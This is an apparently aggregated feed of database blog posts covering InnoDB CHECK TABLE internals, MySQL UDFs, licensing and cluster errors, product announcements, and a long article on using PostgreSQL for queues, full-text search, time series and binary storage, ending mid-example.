The driver's low-level APIs are "pre-documented" here:
          http://www.radgs.com/docs/help/standard.db.nuo.html

          And the high level version:
          http://www.radgs.com/docs/help/NuoConnection.html
          http://www.radgs.com/docs/help/NuoDataSet.html

          Also, I've optimized the strings and the arrays in Concept core. I've reduced the number of memory reallocations, resulting in faster indexing times. I've added a compile-time flag for using std::map instead of my key-value implementation.

std::map is faster than my implementation when adding more than 200,000 key-value pairs, but mine is faster on access. Also, std::map uses at least 1/3 more memory than my implementation, due to its list-style implementation. I use static vectors that reallocate when needed. This reallocation is somewhat slow, but overall it performs better.

          The string operator += was optimized, being up to 20 times faster now, due to a new memory allocation strategy.

In Gyro, besides the NuoDB driver, I've fixed a bug with pagination, discovered in the new version of Concept Client.
                    UI models        
          I've seen some screenshots of enterprise applications, and I've decided that the Gyro application search/results-based UI is not enough for some situations.

          I've added a new property for every entity (you can actually combine models for different entities):


You can choose between search/results (the standard model) and master view/detail, minimizing the number of open forms for the user (and actually increasing productivity for the end user).




          The screenshots are from an actual application, so I've blurred some of the data.

          I've modified the home screen (yes, again):


          And as usual, bug-fixes, most of them regarding the MongoDB applications.
Re: OpenIndiana - hope still exists
          OpenIndiana 2017.04


          + General system changes


          + Desktop software and libraries


          + Development tools and libraries


          + Server software



          Download: wiki.openindiana.org/oi/2017.04+Release+notes
                    MongoDB Stitches New Backend Database for the Cloud        

          Backend as a Service offering aims to enable developers to more easily integrate apps with data services.


                    volvo FMX        
Volvo continues its tradition of video stories with which it presents its technical innovations. Remote control of the heavy-duty FMX-series construction truck was entrusted to a little girl. The test was brutal.







more at avtomotoSiol


[Posted by alfaromeo]

                    What is CHECK TABLE doing with InnoDB tables?        
Recently we had a case where a customer got some corrupted blocks in his InnoDB tables. His largest tables were quite big, about 30 to 100 Gbyte. Why he got these corrupted blocks we have not found out yet (a broken disk?).

When you have corrupted blocks in InnoDB, it is mandatory to get rid of them again. Otherwise your database can crash suddenly.
If you are lucky, only "normal" tables are affected. Then you can dump, drop, recreate and load them again as described in the InnoDB recovery procedure in the MySQL documentation [1].
If you are not so lucky, you have to recreate your complete database or go back to an old backup and do a restore with Point-in-Time Recovery (PITR).

To find out whether some tables are corrupted, MySQL provides two tools: the innochecksum utility [2] and the mysqlcheck utility [3]; or you can run the CHECK TABLE command manually (which is what mysqlcheck uses).

I wanted to know how CHECK TABLE works in detail, so I looked first in the MySQL documentation [4]. But unfortunately the MySQL documentation often does not go into much detail on such specific questions.

So I dug into the code. The interesting lines can be found in the files handler/ha_innodb.cc and row/row0mysql.c. In the following snippets I have cut out a lot of detail.

          The function ha_innobase::check is the interface between the CHECK TABLE command and the InnoDB storage engine and does the call of the InnoDB table check:

// handler/ha_innodb.cc

int ha_innobase::check( THD* thd )
{
    build_template(prebuilt, NULL, table, ROW_MYSQL_WHOLE_ROW);

    ret = row_check_table_for_mysql(prebuilt);

    if (ret == DB_SUCCESS) {
        return(HA_ADMIN_OK);
    }

    return(HA_ADMIN_CORRUPT);
}

          The function row_check_table_for_mysql does the different checks on an InnoDB table:

          • First it checks if the ibd file is missing.

          • Then the first index (dict_table_get_first_index) is checked on its consistency (btr_validate_index) by walking through all page tree levels. In InnoDB the first (primary) index is always equal to the table (= data).

          • If the index is consistent several other checks are performed (row_scan_and_check_index):

            • If entries are in ascendant order.

            • If unique constraint is not broken.

            • And the number of index entries is calculated.

          • Then the next and all other (secondary) indexes of the table are done in the same way.

          • At the end a WHOLE Adaptive Hash Index check for ALL InnoDB tables (btr_search_validate) is done for every CHECK TABLE!

// row/row0mysql.c

ulint row_check_table_for_mysql( row_prebuilt_t* prebuilt )
{
    if ( prebuilt->table->ibd_file_missing ) {
        fprintf(stderr, "InnoDB: Error: ...", prebuilt->table->name);
        return(DB_ERROR);
    }

    index = dict_table_get_first_index(table);

    while ( index != NULL ) {

        if ( ! btr_validate_index(index, prebuilt->trx) ) {
            ret = DB_ERROR;
        }
        else {

            if ( ! row_scan_and_check_index(prebuilt, index, &n_rows) ) {
                ret = DB_ERROR;
            }

            if ( index == dict_table_get_first_index(table) ) {
                n_rows_in_table = n_rows;
            }
            else if ( n_rows != n_rows_in_table ) {

                ret = DB_ERROR;

                fputs("Error: ", stderr);
                dict_index_name_print(stderr, prebuilt->trx, index);
                fprintf(stderr, " contains %lu entries, should be %lu\n", n_rows, n_rows_in_table);
            }
        }

        index = dict_table_get_next_index(index);
    }

    if ( ! btr_search_validate() ) {
        ret = DB_ERROR;
    }

    return(ret);
}

          A little detail which is NOT discussed in the code above is that the fatal lock wait timeout is set from 600 seconds (10 min) to 7800 seconds (2 h 10 min).

          /* Enlarge the fatal lock wait timeout during CHECK TABLE. */
          mutex_enter(&kernel_mutex);
          srv_fatal_semaphore_wait_threshold += 7200; /* 2 hours */
          mutex_exit(&kernel_mutex);

          As far as I understand this has 2 impacts:
          1. CHECK TABLE for VERY large tables (> 200 - 400 Gbyte) will most probably fail because it will exceed the fatal lock timeout. This becomes more probable when you have bigger tables, slower disks, less memory or do not make use of your memory appropriately.

          2. Because srv_fatal_semaphore_wait_threshold is a global variable, during every CHECK TABLE the fatal lock wait timeout is set high for the whole system. Long enduring InnoDB locks will be detected late or not at all during a long running CHECK TABLE command.


Whether this is something that should be fixed to make the system more reliable I cannot judge; that is up to the InnoDB developers. But when you hit such symptoms during long-running CHECK TABLE commands, keep this in mind.
For the first finding I have filed a feature request [5]. This "problem" was introduced a long time ago with bug #2694 [6] in MySQL 4.0, Sep 2004. Thanks to Axel and Shane for their comments.
If you want to circumvent this situation you either have to recompile MySQL with a higher value, or you can use the concept of a pluggable User-Defined Function (UDF), which I have described earlier [7], [8], [9].

Another detail is that at the end of each CHECK TABLE command a check of all Adaptive Hash Indexes of all tables is done. I do not know how expensive it is to check all Adaptive Hash Indexes, especially when they are large. But more optimized code there could perhaps speed up the CHECK TABLE command by a small percentage.

This information is valid up to MySQL/InnoDB 5.1.41 and the InnoDB Plugin 1.0.5.

          Literature

          [1] Forcing InnoDB Recovery
          [2] innochecksum — Offline InnoDB File Checksum Utility
          [3] mysqlcheck
          [4] CHECK TABLE
          [5] Bug #50723: InnoDB CHECK TABLE fatal semaphore wait timeout possibly too short for big table
          [6] Bug #2694: CHECK TABLE for Innodb table can crash server
          [7] MySQL useful add-on collection using UDF
          [8] Using MySQL User-Defined Functions (UDF) to get MySQL internal informations
          [9] MySQL useful add-on collection using UDF

                    MySQL useful add-on collection using UDF        
          I really like this new toy (for me) called UDF. So I try to provide some more, hopefully useful, functionality.

The newest extension I like is the possibility to write to the MySQL error log from the application. Oracle has been able to do that for a long time. Now we can do this as well...

You can find a list of what I have done so far here:

          If you have some more suggestions, please let me know.

You can find the complete details here.
                    Using MySQL User-Defined Functions (UDF) to get MySQL internal informations        
In one of my previous posts I wrote about how to read another process's memory [1]. As an example I tried to get the value of the hard-coded MySQL-internal InnoDB variable spin_wait_delay (srv_spin_wait_delay).

In that example we used gdb or the operating system's ptrace function to retrieve this value. This method has the disadvantage that it is pretty invasive.

          When I was working on a customer support case I had the idea to solve this by the much less invasive method of User-Defined Functions (UDF).

UDF were introduced in MySQL 5.0 [2]. They provide a way to extend MySQL functionality by adding external code.

The nice thing is that you can also use this external code to do some MySQL-internal stuff.

My idea was, instead of using gdb/ptrace to get the value of spin_wait_delay, to write a UDF to get and set this value.

More details about the UDF itself, and how to compile and load it, can be found on my website [3].

          Then the UDF has to be loaded and activated in the database:

          mysql> CREATE FUNCTION spin_wait_delay RETURNS INTEGER SONAME "udf_spin_wait_delay.so";

          To remove the UDF again you can use the following command:

          mysql> DROP FUNCTION spin_wait_delay;

To check whether a UDF is installed, or to see which ones are installed, the following command gives you the answer:

          mysql> SELECT * FROM mysql.func;
          +-----------------+-----+------------------------+----------+
          | name            | ret | dl                     | type     |
          +-----------------+-----+------------------------+----------+
          | spin_wait_delay |   2 | udf_spin_wait_delay.so | function |
          +-----------------+-----+------------------------+----------+

          When the UDF is compiled and properly loaded into the database you can get the value of spin_wait_delay as follows:

mysql> SELECT spin_wait_delay();
+-------------------+
| spin_wait_delay() |
+-------------------+
|                 5 |
+-------------------+

          And now the real nice thing is that you can even set this value as follows:

mysql> SELECT spin_wait_delay(8);
          +--------------------+
          | spin_wait_delay(8) |
          +--------------------+
          |                  8 |
          +--------------------+

With this function we can make a static, hard-coded InnoDB value dynamically changeable. To make it persist across a database restart, the init_file functionality could possibly help you further [4].

With this concept we can think about implementing many missing things without touching the MySQL code itself or recompiling MySQL. Please let me know what is missing in your opinion and I will try to implement it. Because I am not a programmer, the help of those guys would be very much appreciated.

If anybody sees a problem with this method, please let me know. I do not know much about things like thread safety and mutexes, but I think at least reading should not do any harm.

          Caution: When you have a crash in your UDF the whole MySQL server will crash. So be careful and test it intensively!

          Binary

          udf_spin_wait_delay.so (md5 807c6bc09b5dc88a8005788519f2483a)

                    MySQL licenses for dummies        
The following summary shows my personal understanding of MySQL 5.1 licenses, packages, and products. It does not necessarily reflect 100% the way MySQL understands it. But after all the discussions I hope it is as close to reality as possible:

          MySQL Embedded Database Server (Download: enterprise.mysql.com -> OEM Software)
          Classic (OEM license, -MEM -InnoDB)
          Pro (= Classic +InnoDB)
          Advanced (= Pro +Partitioning)

MySQL Community Server (Download: www.mysql.com -> Downloads)
          Community (GPL, -NDB)

          MySQL Enterprise Server (Download: enterprise.mysql.com -> Enterprise Software)
          Pro (GPL or commercial, -NDB +InnoDB +MEM, Basic + Silver customer, MRU + QSP)
          Advanced (= Pro +Partitioning, Gold + Platinum customer)

          MySQL Cluster (Download: http://dev.mysql.com/downloads/cluster/)
          Community Edition (GPL, all features)
          Com (ex CGE?) (OEM or commercial, -InnoDB +NDB)
          Com-Pro (Com, all features)
          Standard Edition (= Com, -NDB-API -Cluster-Repl, -LDAP)

          Upgrade

          EP customer should follow the QSP trail unless it is critical for them to install an MRU to get a quick bugfix to hold them over until the next QSP is released.

          Month version / release
          0 5.1.30
          1 5.1.30-MRU1
          2 5.1.30-MRU2
          3 5.1.31
          4 5.1.31-MRU1 and 5.1.30-QSP
          5 5.1.31-MRU2
          6 5.1.32
          7 5.1.32-MRU1 and 5.1.31-QSP

          Legend

          CE  - Community Edition
          EP - Enterprise Edition (why not EE?)
          MRU - Monthly Rapid Update (EP only)
          QSP - Quarterly Service Pack (EP only)
          OEM - Original Equipment Manufacturer
MEM - MySQL Enterprise Monitor
          CGE - Carrier Grade Edition
Please correct me if I am wrong. And if you have more questions, let me know and I will try to clarify them.
                    MySQL Cluster: No more room in index file        
          Recently we were migrating an InnoDB/MyISAM schema to NDB. I was too lazy to calculate all the needed MySQL Cluster parameters (for example with ndb_size.pl) and just took my default config.ini template.
          Because I am really lazy I have a little script doing this for me (alter_engine.sh).

          But suddenly my euphoria was stopped abruptly by the following error:

          MySQL error code 136: No more room in index file

The usual command that helps me in such a situation is as follows:

          # perror 136
          MySQL error code 136: No more room in index file

          But in this case it is not really helpful. Also

          # perror --ndb 136

does not get us any further. Strange: an index file? We are converting from MyISAM/InnoDB to NDB. Why the hell is it using an index file for this operation? It is clearly a mysqld error message and not a MySQL Cluster error message. And we are also not using MySQL Cluster disk data tables.

After bothering MySQL support a bit, I had the idea to do the following:

          # ndb_show_tables | grep -ic orderedindex
          127

          The MySQL online documentation clearly states:

          MaxNoOfOrderedIndexes
          ...
          The default value of this parameter is 128.

So this could be the reason! After I changed this parameter, followed by the usual rolling restart of the MySQL Cluster, I could continue to migrate my schema into the cluster...
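For reference, a minimal config.ini sketch of the kind of change involved, assuming the parameter lives in the usual [ndbd default] section; the value 512 is just an example, size it to your own schema:

[ndbd default]
# Default is 128 - raise it above the number of ordered indexes your schema needs.
MaxNoOfOrderedIndexes = 512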

          Conclusion
          MySQL errors can be related to cluster errors and do not necessarily point to the source of the problem. The error:

          MySQL error code 136: No more room in index file


just means that MaxNoOfOrderedIndexes is too small!


I hope that I can save you some time with this little article.
                    Web HSP Officially Launches (4) Unique VideoDB Hosting Packages for All VPS and Dedicated Server Clients in North America        

Late Thursday afternoon, Web HSP CEO and co-founder Doug Davis announced the official launch of (4) different VideoDB hosting packages now available to all new and existing customers. The bold move complements the ever-expanding menu of products and services as Web HSP continues their unprecedented growth in 2013.

          (PRWeb September 20, 2013)

          Read the full story at http://www.prweb.com/releases/2013/9/prweb11144328.htm


                    ITX Design Introduces (4) VideoDB Hosting Packages for All VPS and Dedicated Server Clients in North America        

Late Friday afternoon, ITX Design CEO and co-founder Doug Davis announced the official launch of (4) different VideoDB hosting packages now available to all new and existing customers. The bold move complements the ever-expanding menu of products and services as ITX Design continues their unprecedented growth in 2013.

          (PRWeb August 24, 2013)

          Read the full story at http://www.prweb.com/releases/2013/8/prweb11059289.htm


                    SF MongoDB Days: Bigger, Better than MongoDB Los Angeles 2013        

This year, San Francisco was the destination for MongoDB Days 2014, and through the rainy weather and Los Angeles-like traffic, hundreds of passionate developers, partners, and technology vendors gathered to hear about the latest release of MongoDB 2.8. In 2013 there was MongoDB Los Angeles, and naturally we were excited to see what has changed, […]

          The post SF MongoDB Days: Bigger, Better than MongoDB Los Angeles 2013 appeared first on Diamond.


                    MongoDB IPO Rumor Mill: Why MongoDB Will Crush in 2015        

          MongoDB is becoming the go-to database for many, and a household name for those in the biz. MongoDB’s humble beginnings were those of a start up and have since grown into a huge deal and dare I say, a savior to many businesses of varying sizes with an impressive roster of clients including MetLife, BuzzFeed, […]

          The post MongoDB IPO Rumor Mill: Why MongoDB Will Crush in 2015 appeared first on Diamond.


                    RAD Studio FireDAC Support for MongoDB NoSQL Database - Jim McKeeth        
                    Is PostgreSQL good enough?        
tl;dr: you can do jobs, queues, real-time change feeds, time series, object store, document store, and full text search with PostgreSQL. How-to, pros/cons, rough performance, and complexity levels are all discussed. Many sources and relevant documentation are linked to.

          Your database is first. But can PostgreSQL be second?

          Web/app projects these days often have many distributed parts. It's not uncommon for groups to use the right tool for the job. The right tools are often something like the choice below.
          • Redis for queuing, and caching.
• Elasticsearch for searching, and Logstash.
          • Influxdb or RRD for timeseries.
          • S3 for an object store.
          • PostgreSQL for relational data with constraints, and validation via schemas.
          • Celery for job queues.
          • Kafka for a buffer of queues or stream processing.
          • Exception logging with PostgreSQL (perhaps using Sentry)
          • KDB for low latency analytics on your column oriented data.
• Mongo/ZODB for storing JSON documents (or mangodb as a /dev/null replacement) 
          • SQLite for embedded. 
          • Neo4j for graph databases.
          • RethinkDB for your realtime data, when data changes, other parts 'react'.
          • ...
          For all the different nodes this could easily cost thousands a month, require lots of ops knowledge and support, and use up lots of electricity. To set all this up from scratch could cost one to four weeks of developer time depending on if they know the various stacks already. Perhaps you'd have ten nodes to support.

          Could you gain an ops advantage by using only PostgreSQL? Especially at the beginning when your system isn't all that big, and your team size is small, and your requirements not extreme? Only one system to setup, monitor, backup, install, upgrade, etc.

          This article is my humble attempt to help people answer the question...

          Is PostgreSQL good enough?

          Can it be 'good enough' for all sorts of different use cases? Or do I need to reach into another toolbox?

Every project is different, and often the requirements can be different. So this question by itself is impossible to answer without qualifiers. Many millions of websites and apps in the world have very few users (fewer than thousands per month), but they might sometimes need to handle bursty traffic at 100x the normal rate. They might have interactive or soft real-time performance requirements for queries and reports. It's really quite difficult to answer the question conclusively for every use case and for every set of requirements. I will give some rough numbers and point to case studies and external benchmarks for each section.

Most websites and apps don't need to handle 10 million visitors a month, have 99.999% availability when 95% availability will do, ingest 50 million metric rows per day, do 400,000 jobs per second, or query over TBs of data with sub-millisecond response times.

          Tool choice.

I've used a LOT of different databases over time. CDB, Elasticsearch, Redis, SAP (is it a db or a COBOL?), BSDDB/GDBM, SQLite... I've even written some where the requirements were impossible to meet with off-the-shelf systems and we had to build them ourselves (real-time computer vision processing of GB/second coming in from the network). Often PostgreSQL simply couldn't do the job at hand (or MySQL was installed already, and the client insisted). But sometimes PostgreSQL was merely not the best tool for the job.

          A Tool Chest
Recently I read a book about tools. Woodworking tools, not programming tools. The whole philosophy of the book is a bit much to convey here... but The Anarchist's Tool Chest is pretty much all about tool choice (it's also a very fine looking book, that smells good too). One lesson it teaches is about selecting a plane (you know, the things for shaving wood). There are dozens of different types, each perfect for a specific situation. There are also some damn good general-purpose planes, and if you just select a couple of good ones you can get quite a lot done. Maybe not the best tool for the job, but at least you will have room for them in your tool chest. On the other hand, there are also swiss army knives, and 200-in-one tools off TV adverts. I'm pretty sure PostgreSQL is some combination of a minimal tool choice and the swiss army knife tool choice in the shape of a big blue solid elephant.

          “PostgreSQL is an elephant sized tool chest that holds a LOT of tools.”

          Batteries included?

Does PostgreSQL come with all the parts for full usability? Often the parts are built in but a bit complicated to use, and not everything is built in. Luckily there are some good libraries which make the features more usable ("for humans").

For the from-scratch people, I'll link to the PostgreSQL documentation. I'll also link to ready-made systems which already use PostgreSQL for queues, time series, graphs, column stores, and document databases, and which you might be able to use for your needs. This article is slanted towards the Python stack, but there are definitely alternatives in the Node/Ruby/Perl/Java universes. If not, I've listed the PostgreSQL parts and other open source implementations so you can roll your own.

          By learning a small number of PostgreSQL commands, it may be possible to use 'good enough' implementations yourself. You might be surprised at what other things you can implement by combining these techniques together. 

          Task, or job queues.

Recent versions of PostgreSQL support a couple of useful technologies for efficient and correct queues.

First is LISTEN/NOTIFY. You can LISTEN for events and have clients be NOTIFYed when they happen. So your queue workers don't have to keep polling the database all the time; they get notified when things happen.

The recent addition in 9.5 of the SKIP LOCKED locking clause to PostgreSQL's SELECT enables efficient queues to be written when you have multiple writers and readers. It also means that a queue implementation can be correct [2].

          Finally 9.6 saw plenty of VACUUM performance enhancements which help out with queues.
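A minimal sketch of the pattern in plain SQL (the table and channel names here are made up for illustration, not taken from any particular library):

-- Jobs table; workers LISTEN on a channel and are woken by NOTIFY.
CREATE TABLE jobs (
    id         bigserial PRIMARY KEY,
    payload    jsonb NOT NULL,
    created_at timestamptz NOT NULL DEFAULT now()
);

-- Producer: enqueue a job and wake any listening workers.
INSERT INTO jobs (payload) VALUES ('{"task": "send_email"}');
NOTIFY job_queue;

-- Worker: LISTEN job_queue; then claim one job, skipping rows that other
-- workers have already locked (PostgreSQL 9.5+).
BEGIN;
DELETE FROM jobs
 WHERE id = (SELECT id FROM jobs
              ORDER BY id
              FOR UPDATE SKIP LOCKED
              LIMIT 1)
RETURNING id, payload;
COMMIT;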

          Batteries included?

          A very popular job and task system is celery. It can support various SQL backends, including PostgreSQL through sqlalchemy and the Django ORM. [ED: version 4.0 of celery doesn't have pg support]


          A newer, and smaller system is called pq. It sort of models itself off the redis python 'rq' queue API. However, with pq you can have a transactional queue. Which is nice if you want to make sure other things are committed AND your job is in the queue. With a separate system this is a bit harder to guarantee.

          Is it fast enough? pq states in its documentation that you can do 1000 jobs per second per core... but on my laptop it did around 2000. In the talk "Can elephants queue?" 10,000 messages per second are mentioned with eight clients.

          More reading.
          1. http://www.cybertec.at/skip-locked-one-of-my-favorite-9-5-features/
          2. http://blog.2ndquadrant.com/what-is-select-skip-locked-for-in-postgresql-9-5/
          3. https://www.pgcon.org/2016/schedule/track/Applications/929.en.html 

          Full text search.

          “Full text search — Searching the full text of the document, and not just the metadata.”
          PostgreSQL has had full text search for quite a long time as a separate extension, and now it is built in. Recently, it's gotten a few improvements which I think now make it "good enough" for many uses.

The big improvement in 9.6 is phrase search. So if I search for "red hammer" I get things which have both words together - not things that are red plus things that are a hammer. It can also return documents where the first word is "red" and "hammer" appears five words later.

One other major thing that Elasticsearch does is automatically create indexes on all the fields. You add a document, and then you can search it; that's all you need to do. PostgreSQL is quite a lot more manual than that. You need to tell it which fields to index, and update the index with a trigger on changes (see triggers for automatic updates). But there are some libraries which make things much easier. One of them is sqlalchemy_searchable. However, I'm not aware of anything as simple and automatic as Elasticsearch here.
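As a rough sketch of what that manual setup looks like (the table and column names here are invented for the example):

CREATE TABLE docs (
    id   bigserial PRIMARY KEY,
    body text NOT NULL,
    tsv  tsvector
);

-- Keep the tsvector column up to date on INSERT/UPDATE.
CREATE TRIGGER docs_tsv_update
    BEFORE INSERT OR UPDATE ON docs
    FOR EACH ROW EXECUTE PROCEDURE
    tsvector_update_trigger(tsv, 'pg_catalog.english', body);

CREATE INDEX docs_tsv_idx ON docs USING GIN (tsv);

-- Phrase search (9.6+): matches "red" immediately followed by "hammer".
SELECT id, ts_rank(tsv, q) AS rank
  FROM docs, phraseto_tsquery('english', 'red hammer') AS q
 WHERE tsv @@ q
 ORDER BY rank DESC
 LIMIT 10;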
          • What about faceted search? These days it's not so hard to do at speed. [6][7]
          • What about substring search on an index (fast LIKE)? It can be made fast with a trigram index. [8][9]
• Stemming? Yes. [11]
• "Did you mean" fuzzy matching support? Yes. [11]
          • Accent support? (My name is René, and that last é breaks sooooo many databases). Yes. [11]
          • Multiple languages? Yes. [11]
          • Regex search when you need it? Yes. [13]
If your main data store is PostgreSQL and you export your data into Elasticsearch (you should NOT use Elasticsearch as the main store, since it still crashes sometimes), then that's also extra work you need to do. With Elasticsearch you also need to manually set the weighting of different fields if you want the search to work well. So in the end it's a similar amount of work.

Using the right libraries, I think it's a similar amount of work overall with PostgreSQL. Elasticsearch is still easier initially. To be fair, Lucene (which Elasticsearch is based on) is a much more advanced text searching system.

What about the speed? They are index searches, and return fast - as designed. At [1] they mention that the speed is OK for 1-2 million documents, with around 50ms search times. It's also possible to make replicas for read queries if you don't want to put the search load on your main database. There is another report of searches taking 15ms [10]. Note that Elasticsearch often takes 3-5ms for a search on that same author's hardware. Also note that the new asyncpg PostgreSQL driver gives significant latency improvements for general queries like this (35ms vs 2ms) [14].

Hybrid searches (relational searches combined with full text search) are another thing that PostgreSQL makes pretty easy. Say you wanted to ask "give me all companies with employees who wrote research papers, Stack Overflow answers, or GitHub repos containing the text 'Deep Learning', where the authors live within 50km of Berlin". PostgreSQL could do those joins fairly efficiently for you.

          The other massive advantage of PostgreSQL is that you can keep the search index in sync. The search index can be updated in the same transaction. So your data is consistent, and not out of date. It can be very important for some applications to return the most recent data.

          How about searching across multiple human natural languages at once? PostgreSQL allows you to efficiently join across multiple language search results. So if you type "red hammer" into a German hardware website search engine, you can actually get some results.

Anyone wanting more in-depth information should read or watch this FTS presentation [15] from last year. It's by some of the people who have done a lot of work on the implementation, and it talks about the 9.6 improvements, current problems, and things we might expect to see in version 10. There is also a blog post [16] with more details about the various improvements to FTS in 9.6.


          You can see the RUM index extension (which has faster ranking) at https://github.com/postgrespro/rum



          More reading.
          1. https://blog.lateral.io/2015/05/full-text-search-in-milliseconds-with-postgresql/
          2. https://billyfung.com/writing/2017/01/postgres-9-6-phrase-search/
          3. https://www.postgresql.org/docs/9.6/static/functions-textsearch.html
          4. http://www.postgresonline.com/journal/archives/368-PostgreSQL-9.6-phrase-text-searching-how-far-apart-can-you-go.html
          5. https://sqlalchemy-searchable.readthedocs.io/
          6. http://akorotkov.github.io/blog/2016/06/17/faceted-search/
          7. http://stackoverflow.com/questions/10875674/any-reason-not-use-postgresqls-built-in-full-text-search-on-heroku  
          8. https://about.gitlab.com/2016/03/18/fast-search-using-postgresql-trigram-indexes/
          9. http://blog.scoutapp.com/articles/2016/07/12/how-to-make-text-searches-in-postgresql-faster-with-trigram-similarity
          10. https://github.com/codeforamerica/ohana-api/issues/139
          11. http://rachbelaid.com/postgres-full-text-search-is-good-enough/  
          12. https://www.compose.com/articles/indexing-for-full-text-search-in-postgresql/
          13. https://www.postgresql.org/docs/9.6/static/functions-matching.html  
          14. https://magic.io/blog/asyncpg-1m-rows-from-postgres-to-python/report.html
          15. https://www.pgcon.org/2016/schedule/events/926.en.html 
          16. https://postgrespro.com/blog/pgsql/111866
             



          Time series.

          “Data points with timestamps.”
          Time series databases are used a lot for monitoring. Either for monitoring server metrics (like cpu load) or for monitoring sensors and all other manner of things. Perhaps sensor data, or any other IoT application you can think of.

          RRDtool from the late 90s.
To do efficient queries of data over, say, a whole month or even a year, you need to aggregate the values into smaller buckets: minute, hour, day, or month sized buckets. Some data is recorded at such a high frequency that doing an aggregate (sum, total, ...) over all the raw data would take quite a while.

          Round robin databases don't even store all the raw data, but put things into a circular buffer of time buckets. This saves a LOT of disk space.

          The other thing time series databases do is accept a large amount of this type of data. To efficiently take in a lot of data, you can use things like COPY IN, rather than lots of individual inserts, or use SQL arrays of data. In the future (PostgreSQL 10), you should be able to use logical replication to have multiple data collectors.

Materialized views can be handy to provide a different view of the internal data structures, and to make things easier to query.

          date_trunc can be used to truncate a timestamp into the bucket size you want. For example SELECT date_trunc('hour', timestamp) as timestamp.

          Array functions, and binary types can be used to store big chunks of data in a compact form for processing later. Many time series databases do not need to know the latest results, and some time lag is good enough.

          A BRIN index (new in 9.5) can be very useful for time queries. Selecting between two times on a field indexed with BRIN is much quicker.  "We managed to improve our best case time by a factor of 2.6 and our worst case time by a factor of 30" [7]. As long as the rows are entered roughly in time order [6]. If they are not for some reason you can reorder them on disk with the CLUSTER command -- however, often time series data comes in sorted by time.
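Putting those pieces together, a small hypothetical metrics table might look like this (names are illustrative):

CREATE TABLE metrics (
    ts    timestamptz      NOT NULL,
    host  text             NOT NULL,
    value double precision NOT NULL
);

-- BRIN index: tiny, and works well because rows arrive roughly in time order.
CREATE INDEX metrics_ts_brin ON metrics USING BRIN (ts);

-- Aggregate raw points into hourly buckets with date_trunc.
SELECT date_trunc('hour', ts) AS bucket,
       host,
       avg(value) AS avg_value,
       max(value) AS max_value
  FROM metrics
 WHERE ts >= now() - interval '1 day'
 GROUP BY 1, 2
 ORDER BY 1, 2;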

Monasca can provide Grafana and an API, and Monasca can query PostgreSQL. There is still no direct support for PostgreSQL in Grafana itself; however, work has been in progress for quite some time. See the pull request in Grafana.

Another project which uses time series in PostgreSQL is Tgres. It's compatible with statsd and graphite text for input, and provides enough of the Graphite HTTP API to be usable with Grafana. The author also blogs [1] a lot about different optimal approaches for time series databases.

          See this talk by Steven Simpson at the fosdem conference about infrastructure monitoring with PostgreSQL. In it he talks about using PostgreSQL to monitor and log a 100 node system.

          In an older 'grisha' blog post [5], he states "I was able to sustain a load of ~6K datapoints per second across 6K series" on a 2010 laptop.

          Can we get the data into a dataframe structure for analysis easily? Sure, if you are using sqlalchemy and pandas dataframes, you can load dataframes like this...  
          df = pd.read_sql(query.statement, query.session.bind)
          This lets you unleash some very powerful statistics, and machine learning tools on your data. (there's also a to_sql).


          Some more reading.
          1. https://grisha.org/blog/2016/12/16/storing-time-series-in-postgresql-part-ii/
          2. https://www.postgresql.org/docs/9.6/static/parallel-plans.html
          3. http://blog.2ndquadrant.com/parallel-aggregate/
          4. https://mike.depalatis.net/using-postgres-as-a-time-series-database.html  
          5. https://grisha.org/blog/2016/11/08/load-testing-tgres/
          6. http://dba.stackexchange.com/questions/130819/postgresql-9-5-brin-index-dramatically-slower-than-expected
          7. http://dev.sortable.com/brin-indexes-in-postgres-9.5/ 


          Object store for binary data. 

          “Never store images in your database!”
          I'm sure you've heard it many times before. But what if your images are your most important data? Surely they deserve something better than a filesystem? What if they need to be accessed from more than one web application server? The solution to this problem is often to store things in some cloud based storage like S3.

          BYTEA is the type to use for binary data in PostgreSQL if the size is less than 1GB.
          CREATE TABLE files (
              id serial primary key,
              filename text not null,
              data bytea not null
          )
          Note, however, that streaming the file is not really supported with BYTEA by all PostgreSQL drivers. It needs to be entirely in memory.

However, many images are only 200KB up to 10MB in size, which should be fine even if you get hundreds of images added per day. A three-year-old laptop benchmark for you: saving 2500 1MB iPhone-sized images with Python and psycopg2 takes about 1 minute and 45 seconds, just using a single core (that's 2.5GB of data). It can be made 3x faster by using COPY IN/TO BINARY [1], but it is already more than fast enough for many uses.
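For a feel of the round trip, here is a hypothetical example against the files table above (in a real application the bytea value would come in as a bound parameter from your driver rather than as a literal):

-- Store a few bytes (bytea hex literal) and get the generated id back.
INSERT INTO files (filename, data)
VALUES ('tiny.bin', '\x89504e470d0a'::bytea)
RETURNING id;

-- Fetch it again and check its size.
SELECT filename, octet_length(data) AS size_bytes
  FROM files
 WHERE filename = 'tiny.bin';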

          If you need really large objects, then PostgreSQL has something called "Large Objects". But these aren't supported by some backup tools without extra configuration.

Batteries included? Both of the Python SQL libraries (psycopg2 and SQLAlchemy) have built-in support for BYTEA.

But how do you easily copy files out of the database and into it? I made an image save-and-get gist here: a 45-line Python script to save and get files. It's even easier when you use an ORM, since the data is just an attribute (open('bla.png', 'wb').write(image.data)).

A fairly important thing to consider when putting gigabytes of binary data into your PostgreSQL is that it will affect the backup/restore speed of your other data. This isn't such a problem if you have a hot spare replica, have point-in-time recovery (with WAL-E or pgbarman), use logical replication, or decide to restore selective tables.

          How about speed? I found it faster to put binary data into PostgreSQL compared to S3. Especially on low CPU clients (IoT), where you have to do full checksums of the data before sending it on the client side to S3. This also depends on the geographical location of S3 you are using, and your network connections to it.

          S3 also provides other advantages and features (like built in replication, and it's a managed service). But for storing a little bit of binary data, I think PostgreSQL is good enough. Of course if you want a highly durable globally distributed object store with very little setup then things like S3 are first.


          More reading.
          1. http://stackoverflow.com/questions/8144002/use-binary-copy-table-from-with-psycopg2/8150329#8150329

          Realtime, pubsub, change feeds, Reactive.

          Change feeds are a feed you can listen to for changes.  The pubsub (or Publish–subscribe pattern), can be done with LISTEN / NOTIFY and TRIGGER.

          Implement You've Got Mail functionality.
This is quite interesting if you are implementing 'soft real-time' features on your website or apps. If something happens to your data, then your application can 'immediately' know about it. WebSockets is the name of the web technology which makes this perform well; HTTP2 also allows server push, and various other systems were in use long before both of these. Say you were making a chat messaging website, and you wanted to play a "You've got mail!" sound. Your application can LISTEN to PostgreSQL, and when some data is changed a TRIGGER can send a NOTIFY event, which PostgreSQL passes to your application; your application can then push the event to the web browser.
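A minimal sketch of that TRIGGER plus NOTIFY wiring (the table, channel, and function names are made up for the example):

CREATE TABLE messages (
    id      bigserial PRIMARY KEY,
    user_id bigint NOT NULL,
    body    text   NOT NULL
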